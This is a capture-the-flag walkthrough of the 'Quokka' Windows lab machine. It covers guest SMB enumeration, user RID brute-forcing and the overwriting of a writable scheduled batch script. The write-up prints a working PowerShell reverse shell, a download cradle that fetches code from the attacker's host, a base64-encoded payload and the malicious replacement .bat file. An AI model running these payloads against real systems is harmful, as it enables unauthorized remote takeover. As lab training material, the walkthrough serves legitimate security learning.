Quokka – TheHackersLabs Link to heading

OS: Linux
Difficulty: Easy
Platform: TheHackersLabs

‘TheHackersLabs’ Avatar

Summary Link to heading

“Quokka” is an easy machine from TheHackersLabs platform. After inspecting shared resources through SMB service for this machine, we find a .bat script that is being executed every minute. Since we do have permissions to overwrite this file, we overwrite with a malicious file to get access to the victim machine. The shell we obtain is from a priviledged user, pwning the machine.

User Link to heading

Starting with a quick Nmap scan:

❯ sudo nmap -sS -p- --min-rate=5000 --open -n -Pn -vvv 10.20.1.145

We can see multiple ports open. Among them we have: 80 HTTP with Microsoft Internet Information Services, 135 Microsoft RPC, 445 Server Message Block (SMB), 5985 Windows Remote Management (WinRM).

Checking their versions with and applying some recognition scripts -sVC flag returns:

❯ sudo nmap -sVC -p80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.20.1.145

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-03 04:53 -03
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.20.1.145
Host is up (0.00032s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Portfolio y Noticias Tech de Quokka
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:FF:0F:BA (Oracle VirtualBox virtual NIC)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-11-03T07:53:59
|_  start_date: 2024-11-03T07:44:25
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ff:0f:ba (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
|   OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
|   Computer name: WIN-VRU3GG3DPLJ
|   NetBIOS computer name: WIN-VRU3GG3DPLJ\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-11-03T08:53:59+01:00
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -19m58s, deviation: 34m37s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.16 seconds

Visiting http://10.20.1.145 (the victim machine site HTTP page) shows kind of a blog about cybersecurity.

Quokka 1

But the site does not present much more info besides this topic.

From Nmap scan output I can see that SMB service allows guest login. We can use this access to, first, see if we have any shares with NetExec:

❯ nxc smb 10.20.1.145 -u 'guest' -p '' --shares

SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [+] WIN-VRU3GG3DPLJ\guest: (Guest)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [*] Enumerated shares
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  Share           Permissions     Remark
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  -----           -----------     ------
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  ADMIN$                          Admin remota
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  C$                              Recurso predeterminado
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  Compartido      READ,WRITE
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  IPC$                            IPC remota

and we do have shared resource called Compartido.

We can also use NetExec and --rid-brute to see if we can enumerate users:

❯ nxc smb 10.20.1.145 -u 'guest' -p '' --rid-brute
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:WIN-VRU3GG3DPLJ) (signing:False) (SMBv1:True)

SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  [+] WIN-VRU3GG3DPLJ\guest: (Guest)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  500: WIN-VRU3GG3DPLJ\Administrador (SidTypeUser)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  501: WIN-VRU3GG3DPLJ\Invitado (SidTypeUser)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  503: WIN-VRU3GG3DPLJ\DefaultAccount (SidTypeUser)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  513: WIN-VRU3GG3DPLJ\Ninguno (SidTypeGroup)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  1000: WIN-VRU3GG3DPLJ\Omar (SidTypeUser)
SMB         10.20.1.145     445    WIN-VRU3GG3DPLJ  1001: WIN-VRU3GG3DPLJ\0mar (SidTypeUser)

We have 2 potential users: Omar and 0mar.

We can then use smbclient to enumerate the files within Compartidos share with the command:

❯ smbclient -U 'guest%' //10.20.1.145/Compartido -c 'recurse; ls'

  .                                   D        0  Sun Nov  3 05:22:23 2024
  ..                                  D        0  Sun Nov  3 05:22:23 2024
  Documentación                      D        0  Sun Oct 27 11:33:53 2024
  Logs                                D        0  Sun Oct 27 11:33:54 2024
  Proyectos                           D        0  Sun Oct 27 11:33:54 2024
<SNIP>

Those are a lot of files.

I will download all of them connecting to this shared resource with smbclient as guest user and running:

❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'recurse ON; prompt OFF; mget *'

getting file \Documentación\Diagrama_Flujo.pptx of size 0 as Documentación/Diagrama_Flujo.pptx (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Documentación\Informe_Proyecto.pdf of size 0 as Documentación/Informe_Proyecto.pdf (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \Documentación\Archivos_Antiguos\Antiguo_Informe.docx of size 0 as Documentación/Archivos_Antiguos/Antiguo_Informe.docx (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
<SNIP>

Eventually, after inspecting some files, we find a script named mantenimiento.bat with the content:

@echo off
:: Mantenimiento del sistema de copias de seguridad
:: Este script es ejecutado cada minuto

REM Pista: Tal vez haya algo ms aqu...

:: Reverse shell a Kali
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "iex(New-Object Net.WebClient).DownloadString('http://192.168.1.36:8000/shell.ps1')"

:: Fin del script
exit

The hint says this script is executed every minute. We also had WRITE permissions over this shared resource. What if we replace this .bat script by a new one? For this we will create 2 files, a cradle.ps1 file and a file named rev.ps1. I usually do this in Windows machines just to check if Windows Defender blocks the reverse shell. Therefore, first grab a reverse shell Powershell oneliner script from Nishang, copy and adapt it to our attacker machine:

$client = New-Object System.Net.Sockets.TCPClient('10.20.1.110',443);$stream = $client.GetStream();[byte[`$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

where 10.20.1.110 is our attacker IP and 443 the port I will start listening with netcat to obtain a reverse shell. I save this code into a file named rev.ps1.

Then, I create a file named cradle.ps1 with the content:

IEX(New-Object Net.WebClient).downloadString('http://10.20.1.110:8080/rev.ps1')

Encode this payload to pass it to Powershell:

❯ cat cradle.ps1 | iconv -t utf-16le | base64 -w0; echo

SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIAMAAuADEALgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA==

and write a file named exploit.bat with the content:

@echo off

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "powershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADIAMAAuADEALgAxADEAMAA6ADgAMAA4ADAALwByAGUAdgAuAHAAcwAxACcAKQAKAA=="

exit

Start a listener with netcat on port 443 in a terminal and, in another one, expose the files in a temporal Python HTTP server on port 8080:

❯ ls -la && python3 -m http.server 8080

total 16
drwxrwxr-x 2 gunzf0x gunzf0x 4096 Nov  3 05:46 .
drwxrwxr-x 5 gunzf0x gunzf0x 4096 Nov  3 04:49 ..
-rw-rw-r-- 1 gunzf0x gunzf0x   80 Nov  3 05:46 cradle.ps1
-rw-rw-r-- 1 gunzf0x gunzf0x  501 Nov  3 05:46 rev.ps1
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Finally, since we assume that the mantenimiento.bat script is running every minute (as the hint said), just upload exploit.bat as mantenimiento.bat with smbclient replacing the original file:

❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'cd Proyectos/Quokka/Código; put exploit.bat mantenimiento.bat'

putting file exploit.bat as \Proyectos\Quokka\Código\mantenimiento.bat (298.8 kb/s) (average 298.8 kb/s)

We can check that our file has been uploaded checking the date of the files:

❯ smbclient -U 'guest%' //10.20.1.145/Compartido/ -c 'cd Proyectos/Quokka/Código; ls'

  .                                   D        0  Sun Oct 27 11:58:54 2024
  ..                                  D        0  Sun Oct 27 11:58:54 2024
  index.html                          A       52  Sun Oct 27 11:33:54 2024
  mantenimiento - copia.bat           A     1252  Sun Oct 27 11:41:43 2024
  mantenimiento.bat                   A      306  Sun Nov  3 05:58:38 2024
  README.md                           A       56  Sun Oct 27 11:33:54 2024

                7735807 blocks of size 4096. 4637866 blocks available

It is different and, therefore, modified.

After some seconds, we get a request in our Python HTTP server, and get a shell as administrador user:

❯ rlwrap nc -lvnp 443

listening on [any] 443 ...
connect to [10.20.1.110] from (UNKNOWN) [10.20.1.145] 49746
whoami

win-vru3gg3dplj\administrador

PS C:\Windows\system32>

This is a priviledged user. GG.

We can finally read both flags:

PS C:\Windows\system32> type C:\Users\0mar\Desktop\user.txt

9OWi***************

PS C:\Windows\system32> type C:\Users\Administrador\Desktop\admin.txt
j9eC********************

~Happy Hacking